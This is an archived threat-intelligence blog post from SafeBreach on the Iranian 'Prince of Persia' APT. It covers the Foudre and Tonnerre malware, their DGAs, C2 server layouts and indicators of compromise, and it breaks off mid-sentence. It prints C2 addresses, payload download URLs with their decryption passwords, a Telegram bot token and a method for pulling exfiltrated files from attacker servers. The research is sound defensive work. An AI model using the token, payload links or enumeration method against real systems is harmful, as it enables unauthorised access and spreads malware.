{
	"id": "b0397a17-3350-4f2d-a442-bd8b8cef9bb6",
	"created_at": "2026-04-06T00:10:47.246939Z",
	"updated_at": "2026-04-10T03:36:22.918394Z",
	"deleted_at": null,
	"sha1_hash": "9e35d4e7e7c92176ebc097c36b77e326ebece9eb",
	"title": "Unmasking the Evolving Iranian Prince of Persia | SafeBreach",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5227070,
	"plain_text": "Unmasking the Evolving Iranian Prince of Persia | SafeBreach\r\nBy Author:  Tomer Bar, VP Security Research, SafeBreach\r\nArchived: 2026-04-05 18:54:00 UTC\r\nIranian state-sponsored threat actors have been targeting networks and critical infrastructure organizations across\r\nthe globe—as well as dissidents of the Iranian regime—since the early 2000s. In 2016, Palo Alto Networks’ Unit\r\n42 identified one such threat actor known as “Infy” or “Prince of Persia,” with evidence of their activity targeting\r\nvictims in Iran and Europe dating back to 2007. In 2017, activity by the group was observed again through the use\r\nof a new malware variant, dubbed Foudre.\r\nSafeBreach Labs has followed the Prince of Persia group since 2019, and our own original research in 2021\r\npresented evidence that they had dramatically reinforced their operations security activities, technical proficiency,\r\nand tooling capabilities. However, for the next three years, there was no publicly identified activity from the\r\ngroup. Our research team continued to hunt for evidence based on a variety of anchors and patterns we had\r\ndefined. As a result, we were able to maintain unprecedented visibility into their malicious activity during this\r\ntime. \r\nIn the blog below, we first outline the key findings and takeaways of our most recent research targeting the Prince\r\nof Persia threat actor, revealing critical new details that will help other security researchers and cybersecurity\r\nprofessionals better understand—and defend against—this evolving threat. Next, we will provide a high-level\r\noverview of previous research on this threat actor that reveals important context about their motivations and\r\nactivities over the last decade. Then, we will dive into an in-depth analysis of several new malware variants\r\ndiscovered during our latest research campaign, including Foudre v34, Tonnerre v17, Tonnerre v50, an unknown\r\nFoudre version, and more. Finally, we provide an appendix that outlines relevant indicators of compromise\r\n(IoCs). \r\nKey Findings \r\nOur latest research targeting the Prince of Persia threat actor group uncovered the following new details  and key\r\ntakeaways regarding the group’s activity over the last three years: \r\nThe scale of Prince of Persia’s activity is more significant than we originally anticipated. Our research\r\nidentified multiple campaigns that used a large number of malware variants and C2 servers.\r\nThere are at least three active variants of Foudre and Tonnerre using different DGA in parallel and\r\ncommunicating to an active C2 server.\r\nTonnerre v50—which was detected as recently as September 2025 and uses an unknown DGA\r\nalgorithm.\r\nTonnerre v12-16, which uses the original CRC32 based DGA\r\nTonnerre v17, which uses the original CRC32 as the first stage and then adds a second-stage DGA\r\nalgorithm.\r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 1 of 32\n\nFor the first time since 2016, we discovered that the new Tonnerre v50 malware is redirected by the C2\r\nserver to a Telegram group, which includes a Telegram bot that likely uses the Telegram API to send\r\ncommands and get the exfiltrated victim’s data. Telegram may be used as a replacement to the FTP\r\nprotocol used by former versions of Tonnerre.\r\nThe Telegram group name in Persian is ”سرافراز“, pronounced “sarafraz” in English which translates to\r\n“proudly.” Beside the bot is a Persain user name: @ehsan8999100. This user is probably one of the Iranian\r\nhackers behind Prince of Persia. Below is a screenshot taken on December 14, 2025, showing the user had\r\nbeen active the day before.\r\nOur research identified additional unknown variants that are similar to Tonnerre that were probably used to\r\ndownload and execute Foudre:\r\nTwo versions of the Amaq News Finder and Deep Freeze variants. \r\nNew variants of the MaxPinner malware family, which focuses on spying on Telegram’s content. \r\nAnother unknown malware family named Rugissement, which includes variants that are probably\r\nunknown attack vectors used in 2019-2021. \r\nWe found Foudre v34, which was publicly available, and Tonnerre v17, which we captured ourselves. \r\nThe threat actor is using multiple C2 servers. Despite their prevention efforts, we were able to consistently\r\ndownload the victim files exfiltrated by Foudre and Tonnerre from all C2 servers, including the older C2\r\nservers from 2021 and the newer version from September 2025.\r\nMost of the C2 servers we found in the last two years appear to be used for testing purposes by the threat\r\nactor, with a limited number of real victims. We believe sharing the characteristics of the discovered testing\r\nC2 servers will help other security researchers discover additional “production” C2 servers. \r\nBackground\r\nIn 2016, Palo Alto Networks’ Unit 42 initially discovered Prince of Persia, an APT group that appeared to have\r\nties to the Iranian government. Researchers at Qi-Anxin’s Threat Intelligence Center investigated a specific attack\r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 2 of 32\n\ntargeting Danish diplomats—named Operation Mermaid—that appeared to use the same methods and\r\ninfrastructure associated with the group.\r\nAfter the publication, Unit 42 conducted a takedown operation. This gave the researchers more visibility into the\r\norigin of victims, the motive of the attackers, and the scope of the attack. The data gathered reaffirmed the Iranian\r\nconnection—most victims were either in Iran, or were Iranian dissidents, and the attackers did not seem to be\r\nfinancially motivated. As a result of the takedown, Prince of Persia lost access to almost all of the campaign\r\nvictims.\r\nResearch by Claudio Guarnieri and Collin Anderson elaborated more on the Iranian attribution. The threat group\r\ncompromised two news websites related to Jundallah as early as 2010, and exploited ActiveX vulnerabilities to\r\nattack the websites’ visitors. Prince of Persia seemed to have operated heavily around the 2013 Iranian\r\nPresidential elections, targeting Persian press members (such as BBC Persian), and resumed attacking civil society\r\nmembers and activists afterwards.\r\nGuarnieri \u0026 Anderson also observed that after the takedown by Palo Alto Networks, the Telecommunication\r\nCompany of Iran blocked and redirected any traffic originating from Iran aimed at Palo Alto’s sinkholes. This was\r\nprobably a deliberate attempt by the threat actors to reduce visibility and regain control of the victims. This was\r\nnot an ability demonstrated by most threat actors, which further supports the connection to the Iranian\r\ngovernment.\r\nIn August 2017, Prince of Persia activity was observed again, this time through the use of a new malware dubbed\r\nFoudre, which means “lightning” in French. In 2018, Foudre version 8 introduced a new malware variant dubbed\r\nTonnerre, which means “thunder” in French. The two variants worked together, with Foudre serving as the first-stage malware that was used to map a victim’s identity. If the victim was deemed important enough, Foudre then\r\ndownloaded and executed Tonnerre. \r\nAs of 2022, the last known public version of Foudre was v24. The last known public version of Tonnerre was v11;\r\nhowever, we were able to download v14 and v15 from one of the C2 servers in 2022.\r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 3 of 32\n\nAfter that, Prince of Persia appeared to go dark, with no publicly identified activity over the next three years.\r\nBased on our in-depth understanding of this threat actor, we assumed they were still carrying out attacks under the\r\nradar, so we continued to actively hunt for evidence. In order to achieve this kind of monitoring over the course of\r\nseveral years, we established anchors and defined patterns that would help us find a new lead, even if the threat\r\nactor changed tactics, like using a new trojan version or C2 server structure. This tracking allowed us to maintain\r\nvisibility into their malicious activity and develop the research updates presented in this post.\r\nThe graphic below provides an overview of the timeline of the malware development process since 2016,\r\nincluding capture dates. The focus of this blog will be to elaborate on the new findings, which are identified in\r\nbold.\r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 4 of 32\n\nThe Research Process\r\nAs noted above, SafeBreach Labs has followed the Prince of Persia group since 2019. After the group appeared to\r\ngo dark in 2022, our research team continued to hunt for evidence based on a variety of anchors and patterns we\r\nhad defined. As a result, we were able to maintain unprecedented visibility into their malicious activity. Below, we\r\nprovide an analysis of these findings. \r\nAnalysis of the Malware Files\r\nFoudre v34 \r\nWith the new version of Foudre we discovered, the attack vector had changed from a macro file to a Microsoft\r\nExcel file with an embedded executable. The Excel file is fully undetectable by all antivirus engines in VirusTotal.\r\nBelow is an image of the embedded executable header:\r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 5 of 32\n\nThe Excel file drops Foudre v34 as an SFX file:\r\nConf8830.dll is the loader.It will call the exported function f8qb1355 of d232, which is a Foudre v34 DLL and a\r\ncamouflage MP4 file in order to complete the user deception (the icon is of windows media player). The SFX\r\nadditional attack was uploaded from the US in March 2025:\r\nThe threat actor also continues to use Excel files that include a macro as an attack vector\r\n(52e3a856548825ec0a3d6630e881ff4f79d2a11bc3420a73d42e161fabed53d9). The Excel file was included in a\r\nzip file named شاخص شهدای.zip (Notable Martyrs.zip)— alongside three other benign Excel files—and was\r\nuploaded to VirusTotal.com in January 2024 from Germany.\r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 6 of 32\n\nThe Excel file includes macro code to drop and execute ccupdate.tmp.\r\nThe threat actor left previous names of embedded Foudre files as comments:\r\nccupdate.tmp is the current dropped file\r\nEZUpdate.tmp is known to be a Foudre v21 infection from 2020 \r\neuupdate.tmp and cqupdate.tmp infections are not publicly available\r\nOnce the victim opens the excel file and is allowed to open ccupdate.tmp, Foudre is installed.\r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 7 of 32\n\nOne of the samples includes an embedded deceptive message that was taken after May 2023 from this article.\r\nThe main difference from previous versions is that a new DGA algorithm and DGA prefix LOS1are used. In\r\naddition, the algorithm is divided into two steps:\r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 8 of 32\n\nThe first calculates the original DGA by computing a CRC32 of the string LOS1{}{}{}.format(date.year,\r\ndate.month, weeknumber).\r\nThe second DGA phase generates an eight character domain host name (only alphabet letters) by adding\r\nthe value 0x8 and character index to any alphabet character and 0x39 to each digit. This is done in order to\r\ntransform each a-f and 0-9 characters into characters. \r\nThis DGA generates domain names that consist of only characters from the range  j-z. This script implements the\r\nDGA:\r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 9 of 32\n\nAn Internet check is also done to another legitimate site (see the appendix for additional details).\r\nTonnerre v17\r\nTonnerre v17 is the latest version binary that we were able to capture at the time of publishing. This version uses\r\nthe same DGA algorithm as Foudre v34 but with a different key prefix: FTS1. It includes an embedded news\r\narticle that was published on January 20, 2023.\r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 10 of 32\n\nThe file was built by the adversary a day after the article was published. We achieved access to it via direct\r\ndownload from the C2 server by impersonating a Foudre-infected file. After decrypting the SFX file, we obtained\r\nthe final Tonnerre 17 binary. \r\nSince January 2023, we have attempted to capture newer versions of Tonnerre. It took almost three years to find a\r\nnew C2 server that could communicate with this newer Tonnerre version. We will explore this in more depth later,\r\nbut first let’s understand the C2 structure of Foudre v34 and Tonnerre v17. \r\nC2 Server Structures\r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 11 of 32\n\nFoudre v34\r\nThe C2 server structure of Foudre v34 included four directories: 1, 2, de, en. Below is an illustration of the C2\r\nstructure. NOTE: The real C2 server runs on Linux and does not enable directory browsing.\r\nFoudre sends the victim machine’s globally unique identifier (GUID) to the C2 server via a HTTP GET request:\r\nhttps://\u003cc2 server\u003e/1/?c=\u003cmachine name\u003e\u0026u=\u003cuser name\u003e\u0026v=\u003ccurrent version\u003e\u0026s=\u003csubject\u003e\u0026f=\u003cc2\r\nfolder\u003e\u0026mi=\u003cmachine GUID\u003e\u0026b=\u003carch\u003e\u0026t=\u003ctime\u003e\r\nThis is done to check if the Foudre version should be upgraded. The /1/index.php reads a textual file on the C2\r\nserver: \r\nIf the GUID is included in this file, it will redirect the HTTP GET request to download the encrypted SFX\r\nupgrade file.\r\nIf the GUID isn’t included, it will redirect to a non-existing file or just return a “page not found” error. \r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 12 of 32\n\nDirectories 2 and de are used for a signature download as part of Foudre C2 validation—this process was\r\ndescribed in our previous research report.\r\nThe en directory is used to receive and store the exfiltrated files from the C2 server.\r\nUnder the en directory, there are four sub-directories—blkb, dirm, dirt, and cplist—and an index.php file.\r\nThe download of the victim’s files is done via fdir.php under the dirt and dirm directories. It allows the threat actor\r\nto move the exfiltrated data from the C2 server—which is usually in Europe to Iran.\r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 13 of 32\n\nThe index.php stores the exfiltrated data in the dirt, dirm, and blkb folders. It stores the victim’s data separately\r\nfrom the attacker’s testing machines’ exfiltrated files. The victim’s files are stored in folders dirm and dirt, while\r\nthe attacker’s files are stored under the blkb folder. The check is done by reading the machine GUID of the\r\nattacker’s machine from the file blk.lst.\r\nIf the machine GUID is one of the three attacker’s machines above, it will store the files under the blkb folder.\r\nOtherwise, it will store the exfiltrated files under the dirm/dirt folders.\r\nThe goal of the separation is to disallow the fdir.php backend script to download the attacker’s exfiltrated files and\r\nonly allow download of dirm/dirt files. We will explain now how we were able to solve this limitation and\r\ndownload the attacker’s files as well.\r\nThe cplist directory includes a communication log file for each victim—the file name is the victim’s machine host\r\nname. The log file includes the following data:\r\nIP\r\nC2 domain name\r\nmachine GUID\r\ntime \r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 14 of 32\n\nNow that we have the exact time of the communication, the machine GUID, the IP, and the structure of the\r\nexfiltrated file name from the dirm/dirt downloaded files, we can download any file from this attacker’s machine.\r\nWe first tried 256 requests using the formula:\r\n/blkb/\u003cmachineGUID\u003e/L\u003cYY\u003e\u003cMM\u003e\u003cDD\u003e\u003chh\u003e\u003cmm\u003css\u003e.\u003cip\u003e.\u003c0-255\u003e\r\nIt didn’t work. However, when we added different hours and minutes it worked. As an example, we were able to\r\ndownload this file on November 24, 2025, from:  /blkb/\u003cmachineGUID\u003e/L\u003cYY\u003e\u003cMM\u003e\u003cDD\u003e\u003chh\u003e\u003cmm\u003css\u003e.\r\n\u003cip\u003e.\u003c0-255\u003e\r\nWe then noticed that the difference between the time of the communication log and the time in the actual file\r\nname was not random. We assumed it was a fixed time gap and, once we used the same time gap, we were able to\r\ndownload a previous file from October 9, 2025. \r\nSo, by sending up to 256 requests, we were able to download any of the attacker’s exfiltrated files from this\r\nattacker’s machine. This is the final formula:\r\n/blkb/\u003cmachineGUID\u003e/L\u003cYY\u003e\u003cMM\u003e\u003cDD\u003e\u003cfixed hh gap\u003e\u003c fixed mm gap\u003css\u003e.\u003cip\u003e.\u003c0-255\u003e\r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 15 of 32\n\nTonnerre v17\r\nThe C2 server structure of Tonnerre v17 is similar to Foudre v34 and includes three directories: blog, f, and s.\r\nBelow is an illustration of the C2 structure.\r\nThe f directory stores the communication log file (like en/cplist in Foudre v34). The s directory is for the\r\nvalidation of the C2 (like 2 and de in Foudre v34). The blog directory is used to store the exfiltrated files (like en\r\nin Foudre v34).\r\nWe were able to download the victim’s files from 2021. The data is encrypted, but it includes metadata on the file\r\nfull path, host name, user name, Tonnerre version, and machine GUID.\r\nOnce we have the victim’s machine name, we could download the communication log of this victim from the\r\nen/cplist and f directories.\r\nMost of the victims were located in Iran, but there were some across Europe and countries like Iraq, Turkey, India,\r\nand Canada. While we have chosen not to publish the data here due to privacy concerns, we are more than willing\r\nto share the data with authorized law enforcement agencies.  \r\nCovering Their Tracks\r\nMonitoring the Prince of Persia campaigns was challenging, as the threat actor moved between C2 servers\r\nfrequently, used techniques to cover their tracks, and removed non-valued infections. In August 2022, we\r\ndiscovered in real time that the threat actor was uploading commands to delete Foudre from some victims’\r\nmachines and transferring other victims to communicate with a new C2 server. \r\nThe command was implemented like a new version upgrade. Foudre upgraded itself by downloading an encrypted\r\nSFX file. The deletion was completed in the same way, as an encrypted SFX file that instead of installing a new\r\nversion, terminates the Foudre process and then renames the Foudre file name, so it won’t load again after OS\r\nrestart. The SFX file is encrypted with password RBA4b5a98Q, which is the same password used in the version\r\nupgrade process.\r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 16 of 32\n\nThe following list outlines the C2 servers of Foudre v34 and Tonnerre v17—as well as the dates of their activity—\r\nuncovered by our research:\r\n45.80.148.35 – active since September 2025\r\n45.80.151.166 – active between December 2024 and September 2025 (old and new DGA) \r\n45.80.151.24 – active between April 2024 and December 2024 (old and new DGA)\r\n45.80.151.179 – active between October 2023 and April 2024 (old and new DGA)\r\n45.80.148.128 – active between June 2023 and January 2024 (old DGA)\r\n179.43.190.13 – active between July 2022 and May 2024 (new DGA)\r\n45.80.151.71 – testing server rather than fully operational C2 server – used for olptqwrq.space and\r\nkmnnuqru.space between October 2023 and December 2024\r\nNew C2 Server Structures\r\nThe biggest development from our latest research is that we were able to detect the following C2 servers with a\r\nnew structure that the threat actor used to control victims of a new Tonnerre v50 and an unknown, new Foudre\r\nversion:\r\n45.80.148.195 – active since October 12, 2025 – only for the new Foudre version (12-length DGA\r\ngenerated domain names)\r\n45.80.148.124 – active between August 1, 2025 and September 20, 2025 for both the new Foudre version\r\nand new Tonnerre v50 (10- and 13-length DGA generated domain names)\r\nTonnerre v50 \u0026 New Foudre Version C2 Server Structure\r\nThe C2 server structure includes four directories: r, search, t, web. Below is a local illustration of the C2 server.\r\nNOTE: The real c2 server is usually a LiteSpeed Web server.\r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 17 of 32\n\nThe r directory is used for storing the communication logs (similar to “f” directory in previous C2 servers). The\r\nsearch directory is used for C2 validation (similar to “s” directory in previous C2 servers). The web directory is\r\nused for storing the exfiltrated files (similar to “blog” directory in previous C2). The t directory stands for\r\nTelegram and is used for downloading the file tga.adr to communicate with the Telegram API\r\n(https://crsvbuxfoovzy.privatedns.org/t/tga.adr).\r\nHowever, the download of the tga.adr file can only be achieved for a close list of enabled victims GUIDs. We\r\nwere able to get the GUID and trigger the download of the tga.adr file.\r\nThe content of tga.adr is:\r\nTGsend: Actived\r\n874675833\r\n7900216285:AAEVjLjt4csUKGanerJuuiDhdsmlUv0yooM\r\nThe first line includes Telegram’s bot chat_id and the second line includes Telegram’s token.\r\nWe used the token to query the chat members count and found two members: \r\nThe first member is the bot, named “ttestro1bot,” which probably stands for Tonnerre Test Robot.\r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 18 of 32\n\nThe bot doesn’t have permissions to read chat messages:\r\nThe second member is even more interesting: Ehsan (written in Persian), who is probably one of the threat group\r\nhackers responsible for commanding the victim’s machines over Telegram:\r\nEhsan is a private user type with the following permissions:\r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 19 of 32\n\nThis user is still active as recently as December 13, 2025:\r\nEhsan is a common Persian name typical for an Iranian. This attribution is pretty strong in combination with the IP\r\nlocation of the attacker’s testing machine. We tracked the IP addresses used over several years, all of which\r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 20 of 32\n\nindicated Iran as the location. While different IP location databases provided different cities, all of them were in\r\nIran: \r\n83.122.48.123 – IRAN – Tehran / Zahedan /  Mashhad\r\n37.156.153.108 – IRAN – Tehran / Bandar-e Emam Khomeyni \r\n5.125.60.37 – IRAN – Tehran / Sabzevar / Mashhad\r\n37.156.155.168 – IRAN – Tehran / Karaj / Mashhad\r\n113.203.19.147 – IRAN – Tehran / Mashhad\r\nNew Foudre Version C2 Server Structure \r\nThe C2 server structure for the new (unknown) Foudre version includes four directories: dirm, dirt, download,\r\nkey, and list. Below is a local illustration of the C2 server structure.\r\nThe list/slist directory is used for storing the communication logs (similar to “en/cplist” directory in previous C2\r\nservers).\r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 21 of 32\n\nThe key directory is used for C2 validation. Every day, Foudre downloads a dedicated signature file encrypted\r\nwith an RSA private key by the threat actor and then uses RSA verification with an embedded public key to verify\r\nthat this domain is an approved domain. The request’s format is:\r\n“https://\u003cdomain name\u003e/key/\u003cdomain name\u003e\u003cyy\u003e\u003cday of year\u003e.sig”\r\nThe purpose of the download directory is unknown. We believe it is probably used to download and upgrade to a\r\nnew version. The dirm and dirt directories are on the root folder and are used to store the exfiltrated files.   \r\nTonnerre v50 \u0026 New Foudre Generated Domain Names\r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 22 of 32\n\nThe TLD extensions are “site,” ”hbmc.net,” and “ix.tc” for Foudre; for Tonnerre the TLD is “privatedns.org.” The\r\nFoudre DGA is unknown, generates varied alphabet domain names in 10 or 12 character lengths, and different\r\nTLDs: “site”, “ix.tc”, and “hbmc.net”. Tonnerre DGA generates 13-character length domain names with \r\n“privatedns.org” as TLD. \r\nBelow are some examples of the C2 server’s domain names: \r\nFoudre\r\ndmxqdlcuiryu.site\r\nxleeuzjdpqwm.ix.tc\r\nxleeuzjdpqwm.hbmc.net\r\nTonnerre\r\ncrsvbuxfoovzy.privatedns.org\r\nOlder Variants Discovered for the First Time\r\nIn addition to the new C2 server and Telegram group, we also discovered important findings on the early stages of\r\nFoudre campaigns dating back to 2017 and 2020.\r\nAmaq News Finder – 2017 July-October\r\nWe discovered a different variant of Foudre camouflaged as Amaq News Finder (AMF). This is probably one of\r\nthe first attack vectors to download and execute Foudre. Amaq News Agency is a news outlet linked to the Islamic\r\nState (ISIS). In March 2019, Amaq News Agency was designated as a foreign terrorist organization by the United\r\nStates Department of State.\r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 23 of 32\n\nIn the example below, pressing on the Start button will execute the trojan’s malicious activity which is similar to\r\nFoudre but different in the URLs used and in its use of an encryption key (amfkey01.key).\r\nThe TLD is also different: .stream,.in, .mooo.com,.ddns.net,.dynu.net. The DGA prefix is AmaqFinder1, which is\r\nlonger than the regular three uppercase letters and digits used in all other versions of both Fourde and Tonnerre.\r\nThis leads us to believe it was used on high valued victims.\r\nAmaqFinder was also used to download and execute Foudre v3 on October 2017\r\n(160bb722bd70b70c3e993c8eba59d8cf8117899073a4a6e42b0240d858a98dad).\r\nThe DGA AmaqFinder1201710401 (\u003cAmaqFinder1\u003e\u003cyear=2017\u003e\u003cmonth=10\u003e\u003cweek=40\u003e1) generates the C2\r\nhostname: eab6ff48.stream. hxxp://eab6ff48.stream/update/af17818.tmp resolved to 185.148.144[.]3\r\nThe use of “af” in the beginning of the file name is probably the initials of AmaqFinder1 and the digits are the\r\ndate (August 18, 2017) and decrypted using password NPA46b3a98L. Version 1.7 of AmaqFinder uses the same\r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 24 of 32\n\nthird-party sites: http://www.cnbc.com/id/100727362/device/rss/\r\nMax Pinner v8 \u0026 the Unknown Rugissement Variant\r\nWe also discovered a newer version of MaxPinner (v8), which is the Telegram data-focused trojan. The latest\r\nknown version was v5. Version 8 appears to have been developed in March 2021. Our analysis revealed an\r\nadditional malware family named Rugissement, meaning “roar” in English, by the threat actor. The MaxPinner\r\nchecks if Tonnerre versions 12-18 or Rugissement 16-17 are already installed on the victim’s machine. If so, it\r\nwon’t infect it with MaxPinner.\r\nThe MaxPinner is downloaded by the loader DLL of Foudre v24, named conf6829.dll\r\n(FFCEC3018C6D56C83EE2F7F14D2A63B945ECEAB13EE9EBDA730B4975942B0935). It downloads and\r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 25 of 32\n\nexecutes MaxPinner from http://2fe55007.xyz/pinner/tdupdatex.dat, which is an encrypted rar file with password\r\naqoiR4.\r\nDeep Freeze Version\r\nWe also discovered a different variant of Deep Freeze from 2019-2020 that is similar to AmaqFinder with the\r\nsame structure. This variant was probably used to infect victims with Foudre. The upgrade of the malware to a\r\nnewer version in all Prince of Persia malware families included an embedded password that is used to decrypt the\r\ndownloaded binary and execute it.  \r\nAll known versions of Foudre use: RBA4  b5a98Q\r\nAmaq Finder versions use: NPA46b3a98L\r\nTonnerre versions use: Ttc kjc Aa54cE\r\nMaxPinner versions use: TtWkjcGa54cE\r\nThere are only two different characters between the last two passwords and six similarities between the first two\r\npasswords. \r\nDeep Freeze version uses password: DFV54zZ8c. It probably stands for Deep Freeze version 54. The DGA prefix\r\nalso seems to be deliberately chosen for this version (Deep Freeze): DFH1. The TLD extensions are .pw and\r\ndynu.net, which were used by Foudre as well.  \r\nThe Deep Freeze binary malware was uploaded from Brazil and Turkey.\r\nBelow is an example of the date and file size of the Deep Freeze variant we discovered. \r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 26 of 32\n\nC2 Servers and DGA Algorithm Analysis\r\n45.80.148.35 – active since September 2025\r\n45.80.151.166 – active between December 2024 and September 2025 (old and new DGA)\r\n45.80.151.24 – active between April 2024 (old and new DGA)\r\n45.80.151.179 – active between October 2023 to April 2024 (old and new DGA)\r\n45.80.148.128 – active between June 2023 to January 2024 (old DGA)\r\n179.43.190.13 – active between July 2022 to May 2024 (new DGA)\r\n45.80.151.71 – testing server rather than fully operational C2 server – used for olptqwrq.space and\r\nkmnnuqru.space between October 2023 and December 2024.\r\nTonnerre v50 and Unknown Foudre Version C2 Server\r\nC2 Server: 45.80.148.195\r\nActive Dates: Since October 12, 2025, for Foudre\r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 27 of 32\n\nDomain Names: \r\nhkdhhwsafvnef.hbmc.net\r\nzjnomxhcrkfc.site\r\nWhpgwzunsijn.site\r\nGwmkgkfyovzy.site\r\nVitevjtlawkl.site\r\nDmxqdlcuiryu.site\r\nRbhfrmezhmlz.site\r\nPlfwpybxjysx.site\r\nOszzoalgfarg.site\r\nC2 Server: 45.80.148.124 \r\nActive Dates: Between August 1, 2025, and September 2025 for both Foudre and Tonnerre new version\r\nDomain Names:\r\nhhwcpxxbnk.site\r\nddqwhrrkfc.site\r\ncrsvbuxfoovzy.privatedns.org\r\nsdagmihqcbgup.privatedns.org\r\nvtgpzfdmwkpah.privatedns.org\r\nxjhdvkoszwdpt.privatedns.org\r\nxleeuzjdpqwm.ix.tc\r\nazffhynitsmv.ix.tc\r\nxleeuzjdpqwm.hbmc.net\r\nC2 Server: 45.80.149.100\r\nActive Dates: Probably an earlier C2 server from February – April 2025 \r\nDomain Names: \r\ntegfxbnk.site\r\niiunewhmlz.site\r\nzbddztherkfc.ix.tc\r\nffhbnqtsmv.site\r\nauuxshqodj.ix.tc\r\nejjnhkucbw.ix.tc\r\nNotes: The domain names end in the same way as the domain names from recent servers.\r\nThe new unknown DGA algorithm does not create a totally random domain name. We found out that the last four\r\ndigits of Foudre DGA generated the same four last letters in different C2 servers and at different times, with\r\ndifferent TLD and with different domain name length. This occurs for both Foudre 10-length and 12-length\r\ndomain names and even for a single Tonnerre 13-length domain name.   \r\nC2 Server 45.80.149.100 C2 Server 45.80.148.124 C2 Server 45.80.148.195\r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 28 of 32\n\nffhbnqtsmv    18/3/25 azffhynitsmv 31/7/25\r\ntegfxbnk       15/2/25 hhwcpxxbnk 10/9/25\r\nzbddztherkfc 1/4/25 ddqwhrrkfc    3/9/25 zjnomxhcrkfc 10/12/25\r\niiunewhmlz   29/3/25 rbhfrmezhmlz  22/10/25\r\ncrsvbuxfoovzy 5/9/25\r\n(Tonnerre)\r\ngwmkgkfyovzy 25/11/25 (Foudre)\r\nThis might indicate that the new DGA algorithm of 10/12/13-length domain names is not a replacement of the\r\nCRC32 that generates exactly 8-length domain names with a new algorithm that generates more than 13 characters\r\nand 10/12/13 first characters are selected. It can be a mixture of: \u003c8 characters CRC32\u003e\u003cdifferent algorithm to\r\ngenerate the last 4 characters\u003e \r\nLooking closer we found some repeating patterns in the domain names that contradict the CRC32 assumption,\r\nwhich is expected to generate random results:\r\nFodure 12-length .site tld: The first letter always equals the fifth letter and the eighth equals the last:\r\ngwmk gkf yovzy\r\nvite vjt lawkl\r\nrbhf rme zhmlz\r\nplfw pyb xjysx\r\noszz oal gfarg\r\ndmxq dlc uiryu\r\nzjnomxhcrkfc.site – The latest domain name from December 10, 2025, is the only one that doesn’t\r\nuse the above pattern. The first letter does not equal the fifth letter. \r\nFodure 12-length .site ix.tc: The third letter always equals the fourth letter:\r\nazffhynitsmv\r\nxleeuzjdpqwm\r\nZbddztherkfc\r\nFodure 10-length .site tld: The first letter always equals the second letter:\r\nhh wcpx xbnk\r\ndd qwhr rkfc\r\nff hbnq tsmv\r\nTonnerre 13-length .privatedns.org: The fourth letter always equals the eleventh letter:\r\nsdag mihqcb gup\r\nvtgp zfdmwk pah\r\nxjhd vkoszw dpt\r\ncrsv buxfoo  vzy\r\nWe are sharing the above information to help other researchers predict the new DGA algorithm. Our assumption is\r\nthat the algorithm is now more complex; it may skip different indexes. For example, if we skip the first, fifth,\r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 29 of 32\n\neighth and twelfth characters: gwmkgkfyovzy will become wmkkfovz. It’s an 8-length domain name that can be\r\ngenerated by CRC32 and the ‘g’ and ‘y’ are added in the above locations. This algorithm does not explain the\r\nrepeating of the last four characters in different dates. \r\nAnother observation is that after a double letter in the domain name, there are usually exactly 8 characters until the\r\ndomain name’s end (e.g., hhwcpxxbnk, 